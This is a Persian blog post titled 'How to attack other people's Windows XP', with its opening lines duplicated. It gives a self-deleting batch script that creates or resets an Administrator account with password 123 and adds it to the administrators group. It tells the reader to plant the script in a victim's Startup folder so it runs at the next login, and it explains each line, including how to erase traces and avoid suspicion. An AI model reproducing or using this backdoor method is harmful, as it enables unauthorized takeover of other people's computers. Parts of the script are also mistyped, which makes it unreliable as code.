Programing.BlogSky.com

چگونه به ویندوز اکس پی دیگران حمله کنید؟ 

 دستورات زیر را درNotepadمی نویسیم ودر فایلی با نام و پسوندtest.bat ذخیره میکنیم :  
 

چگونه به ویندوز اکس پی دیگران حمله کنید؟

 دستورات زیر را درNotepadمی نویسیم ودر فایلی با نام و پسوندtest.bat ذخیره میکنیم : 
 
echo off@
net user administrator 123 /add
net localgroup administrator administrators /add
net user administrator 123
del test.bat
echo on@

2- بعد فایل مورد نظر را در فلاپی کپی کرده و به سراغ کامپیوتر قربانی می رویم و فایلی که در مرحله قبل ساخته ایم را در مسیر زیر کپی می کنیم (به فرض که ویندوز در درایو Cنصب باشد و کاربری با نامhassan
  مدیر سیستم باشد ):

C:\Documents and Settings\hassan\Start Menu\Programs\Startup

3-خوب حالا فقط کافی است که منتظر بمانید تا کاربرhassan یک بار وارد شود دیگر تمام است و شما بعد از آن می توانید با نام کاربری Administrator و کلمه عبور 123 وارد سیستم شوید .


**توضیح دستورات مربوط به فایلی که میسازیم :
-در خط اول این دستور باعث مخفی شدن بقیه دستورات در حال اجرا از دید کاربر می شود .
-در خط دوم ما یک کاربر بانام Administratorو کلمه عبور 123 می سازیم .(این عمل برای این صورت 
می گیرد که ممکن است نام Administratorرا تغییر داده باشند ).
-در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم .
-در خط چهارم احتمال می دهیم که نام Administratorرا تغییر داده نشده باشد . پس ما فقط پسورد
آن را عوض می کنیم .
-در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم .
-در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم .

نکته : توجه کنید که به جای کاربرAdministratorو کلمه عبور 123 هر کاربر یا کلمه عبور دیگری می توانید قرار دهید اما این کاربر کمتر باعث شک می شود .